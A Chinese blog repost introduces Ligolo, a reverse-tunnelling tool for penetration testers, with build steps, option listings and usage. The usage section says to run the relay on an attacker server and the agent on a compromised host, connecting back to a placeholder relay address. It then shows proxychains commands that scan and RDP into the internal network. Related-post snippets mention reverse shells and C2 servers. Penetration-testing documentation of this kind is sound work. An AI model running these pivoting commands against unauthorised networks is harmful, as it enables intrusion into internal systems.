服务器连接工具_Ligolo:一款反向隧道工具

最新推荐文章于 2024-08-23 09:31:30 发布
最新推荐文章于 2024-08-23 09:31:30 发布
阅读量430 收藏 1
点赞数
文章标签: 服务器连接工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39860108/article/details/111336526
版权

fff5413af0480394d1bdd4642849177a.png

Ligolo

Ligolo是一款专为安全测试人员设计的反向隧道工具。实际上,它是一款实现和使用都非常简单的轻量级工具,可以帮助渗透测试研究人员轻松通过一个反向连接建立一个完全安全的SOCKS5或TCP通信隧道。

跟Meterpreter以及Autoroute + Socks4a相比,Ligolo的运行速度更快,并且更加稳定。

功能介绍

1、TLS 1.3隧道,带有TLS绑定;

2、多平台支持,包括Windows、Linux和macOS等;

3、多路复用(1条TCP连接可多路复用);

4、SOCKS5代理或中继;

使用场景

假设你在一次外部安全审计任务过程中,现在已经成功入侵了一台Windows/Linux/macOS服务器。这台服务器位于目标组织的本地局域网络之中,而你想要与该网络内的其他主机建立通信连接。

那么此时,Ligolo就可以帮助你实现这个目标。它可以给我们建立一条通信随到并访问目标内部服务器的资源。

工具演示

使用Proxychains (WAN)实现RDP通信连接中继。

工具性能

下面给出的图片是该工具在两台100MB/s主机之间的性能图,但实际情况需取决于目标系统和网络配置。

8b835a546b01ac6559e774196468b16e.png

工具安装和使用

安装/编译

首先,请确保你的系统中已经安装了Go环境/工具。接下来,使用下列命令获取Ligolo项目远吗和相关依赖组件:

cd `go env GOPATH`/srcgit clone https://github.com/sysdream/ligolocd ligolomake dep

生成自签名的TLS证书,并存放至项目的certs目录之中:

make certs TLS_HOST=example.com

当然了,你还可以通过TLS_CERT选项来使用你自己的TLS证书:

make build-all TLS_CERT=certs/mycert.pem

最后,进行项目代码构建。

针对所有系统架构:

make build-all

针对当前系统架构:

make build

工具选项

Localrelay选项:

Usage of localrelay:  -certfile string        The TLS server certificate (default "certs/server.crt")  -keyfile string        The TLS server key (default "certs/server.key")  -localserver string        The local server address (your proxychains parameter) (default "127.0.0.1:1080")  -relayserver string        The relay server listening address (the connect-back address) (default "0.0.0.0:5555")

Ligolo选项:

Usage of ligolo:  -autorestart        Attempt to reconnect in case of an exception  -relayserver string        The relay server (the connect-back address) (default "127.0.0.1:5555")  -skipverify        Skip TLS certificate pinning verification  -targetserver string        The destination server (a RDP client, SSH server, etc.) - when not specified, Ligolo starts a socks5 proxy server

工具使用

Ligolo由下列两个模块组成:

1、 localrelay

2、 ligolo

Localrelay需要在攻击者控制的服务器端运行,Ligolo则需要在目标主机上运行。

对于localrelay,你可以直接使用默认选项,它将监听端口5555的所有接口,并等待来自ligolo的连接。

对于ligolo,你必须使用-relayserver ip:port参数的指定中继服务器的IP地址,也就是攻击者服务器的IP地址。

你可以使用-h选项查看工具的帮助命令。

Localrelay和ligolo之间的连接建立成功之后,工具会在中继服务器的TCP端口1080上设置一个SOCKS5代理,接下来你就可以使用你喜欢的工具来渗透目标的LAN网络了。

在攻击者服务器端,运行下列命令:

./bin/localrelay_linux_amd64

在目标主机中,运行下列命令:

> ligolo_windows_amd64.exe -relayserver LOCALRELAYSERVER:5555

一旦通信连接建立成功,请在ProxyChains的配置文件中设置下列参数(在攻击者服务器端):

[ProxyList]# add proxy here ...# meanwile# defaults set to "tor"socks5     127.0.0.1 1080

最后:

$ proxychains nmap -sT 10.0.0.0/24 -p 80 -Pn -A$ proxychains rdesktop 10.0.0.123

许可证协议

Ligolo项目的开发与发布遵循GNU General Public License v3.0开源许可证协议。

项目地址

https://github.com/sysdream/ligolo

* 参考来源:sysdream,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

e297b4af5a04ad4e9ae88507a7400ef2.gif

精彩推荐

d0c928b113dedc9dfe8b3197ce63235e.png

f4b14a8a993978a0436afa136c74735a.png9099104d094ff02811bf2c03e2532d0a.png01bec9709b145c6c34c05027940953c4.png

2ef92359dec7b9789a78519667652a0f.gif

weixin_39860108
关注
构建隐蔽的通信信道以增强数据安全性
QoTypescript的博客
10-04 206
为了确保通信的隐私和机密性,我们可以使用Ligolo ng(以下简称Ligolo)来构建一个隐蔽的通信信道。Ligolo是一个开源工具,它使用低级别的网络协议,如ICMP和DNS,来隐藏通信并防止数据被监控和拦截。通过使用Ligolo,我们可以建立一个隐蔽的通信信道,以增强数据的安全性和隐私性。现在,我们已经设置好了发送方和接收方的脚本。你可以在两个不同的机器上运行这些脚本,并确保发送方能够成功发送数据,接收方能够成功接收并解码数据。在接收方,我们需要编写一个脚本来接收发送方发送的数据。
C2_Server:C2服务器通过反向外壳连接到受害计算机
03-13
反向外壳程序基本上是注入到trgt机器中的代码,以便目标机器可以单独将发起连接请求发送回攻击者机器,在该机器上C2服务器正在打开/侦听端口上运行/侦听。 同样,在这里,我们正在做同样的事情。 一旦将C2服务器...
利用反向通道与隧道技术透过firewall
小李的专栏
01-10 1040
1:反向通道技术比如说一台为于firewall之后的服务器A(ip:ipA),我的机子为B(ip:ipB)。firewall只允许到来的数据包到达A的80和25端口,其他一切拒绝。现在先在自己的机子上执行[sztcww@haha sztcww]# nc -l -n -v -p 80[sztcww@haha sztcww]# nc -l -n -v -p 25假如在A的机子上找到这个phf漏洞(不过
Ligolo-ng 安装与使用教程
gitblog_00009的博客
08-10 413
Ligolo-ng 安装与使用教程 ligolo-ngAn advanced, yet simple, tunneling/pivoting tool that uses a TUN interface.项目地址:https://gitcode.com/gh_mirrors/li/ligolo-ng 1. 项目介绍 Ligolo-ng 是一个轻量级、快速的工具,专为渗透测试者设计,用于通过反向T...
探索 Ligolo-NG:新一代网络嗅探与数据包分析工具
gitblog_00081的博客
04-09 390
探索 Ligolo-NG:新一代网络嗅探与数据包分析工具 ligolo-ng项目地址:https://gitcode.com/gh_mirrors/lig/ligolo-ng 是一个强大的、开源的网络嗅探和数据包分析工具,旨在帮助网络安全研究人员、开发人员和爱好者监控网络流量,发现潜在的安全问题和优化网络性能。它的设计思路简洁,易于使用,并且提供了一系列先进的功能,使得网络诊断变得更加直观和高效...
**Ligolo-ng 开源项目安装与使用教程**
最新发布
gitblog_00256的博客
08-23 366
Ligolo-ng 开源项目安装与使用教程 ligolo-ng项目地址:https://gitcode.com/gh_mirrors/lig/ligolo-ng 1. 项目目录结构及介绍 Ligolo-ng 是一个基于 GitHub 的开源项目,它专注于提供特定的安全相关功能或服务(具体细节因项目说明不详,以下为一般性描述)。 ligolo-ng/ ├── README.md #...
ReverseProxy_ynh:yunohost 的反向代理
07-08
Yunohost是一款开源的自助式服务器管理工具,它允许用户轻松地在个人或小型组织的服务器上部署和管理各种服务。在这个"ReverseProxy_ynh"项目中,我们聚焦于Yunohost的反向代理配置,这是一项关键的技术,用于优化...
shell_lover:反向外壳备忘单工具
03-18
shell_lover 该工具反向外壳备忘单,可根据您的需要为您定制外壳 用法
worcp_reversed:进行少量反向工程以对WOR控制面板进行反向工程
04-12
在IT行业中,反向工程(Reverse Engineering)是一种技术手段,用于理解软件或系统的内部工作原理,通常是通过分析二进制代码、汇编语言或者高级语言的源代码来实现。在这个特定的项目“worcp_reversed”中,目标是...
ligolo:渗透测试者可以通过反向测试使渗透测试者更加容易https
03-18
Ligolo是一个简单轻巧的工具,可通过反向连接以完全安全的方式建立SOCKS5或TCP隧道(带椭圆曲线的TLS证书)。 这相当于把Meterpreter就会自动布线与SOCKS4A +,但更稳定,速度更快。 用例 您在外部审核期间破坏了...
pyvidc-超级中介(反向连接的端口转发应用)
06-12
pyvidc-超级中介的说明:这个软件的创意来自yyc写的vidc的反向连接的功能,我把它极致化了。它本身不存在任何独立应用的价值,它的价值体现在它所连接的其他端口上,比如远程桌面,socks代理。 它的优点:只需要一个中介端口就可以无限制的进行端口转发,甚至转发中介端口(我仅测试了远程桌面和socks代理)。相对的安全性,虽然没有安全验证机制,但它对连接的处理是不透明的,用户在不知道连接标识的情况下无法获取其他人的连接
5种端口映射工具打包下载
07-17
压缩包内包含5种端口映射工具
rtcp2udp, 反向TCP端口到UDP转发工具.zip
09-17
rtcp2udp, 反向TCP端口到UDP转发工具 rtcp2udp反向端口转发工具v 1.0反向TCP端口到UDP转发工具问题反馈:ringzero@0x557.org一个稳定的UDP反向端口映射方法 Http服务器 <- 内网机器-> 因特网
frp 反向隧道代理(内网穿透)之协议 “websocket”
liulilittle的博客
09-03 4900
协议支持:SSL流、TLS流、TCP流、加密TCP流、WebSocket 流,等多个类型传输层,可用于海外服务器反代中国大陆家宽设备,故而映射服务到公共网络上。WebSocket(HTTP)透明协议,可能存在被 WebSocket 帧被渗透审查的安全问题,所以相对适用于单一的海外对海外的网络环境。适配平台:win-x86_32、win-x86_64、linux-s390x、linux-x86_64、linux-aarch64。frpc.ini 客户端配置。frps.ini 服务器配置。
探索网络的利器:Ligolo - 简单易用的反向隧道工具
gitblog_00027的博客
05-13 302
探索网络的利器:Ligolo - 简单易用的反向隧道工具 ligoloReverse Tunneling made easy for pentesters, by pentesters https://sysdream.com/项目地址:https://gitcode.com/gh_mirrors/li/ligolo Ligolo 是一个专为渗透测试者设计的轻量级工具,它简化了在安全环境中建立S...
【网络安全】无需SOCKS支持,帮助广大渗透测试人员建立一条隐蔽的通信信道
HBohan的博客
09-25 5224
关于Ligolo-ng Ligolo-ng是一款高级信道工具,该工具基于TUN接口实现其功能。Ligolo-ng是一款轻量级的快速工具,可以帮助广大渗透测试人员利用反向TCP/TLS连接建立一条隐蔽的通信信道,而且无需SOCKS支持。 功能介绍 Tun接口(不再需要SOCKS); 简单的UI界面,支持选择代理和网络信息; 易于使用,易于安装; 基于Let’s Encrypt的自动化证书配置; 高性能(多路复用); 不需要高级权限; 套接字监听/代理绑定; 多平台代理支持; 工具构建 构建Ligolo-ng.
3、SSL隧道
Fly_鹏程万里
06-08 3176
0x00 原理解释关于隧道技术的定义请参考前一篇文章:http://www.heysec.org/archives/854,其实不同的隧道技术,利用原理都一样,分为3个版本:Client(攻击者or客户端)、Server(隧道技术的服务端,提供端口转发也就是数据包重新封装)、Content-Server(目标服务器,这里一般是内网其它机器);Server端提供一个服务用来封装数据并转发出来,客户端...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值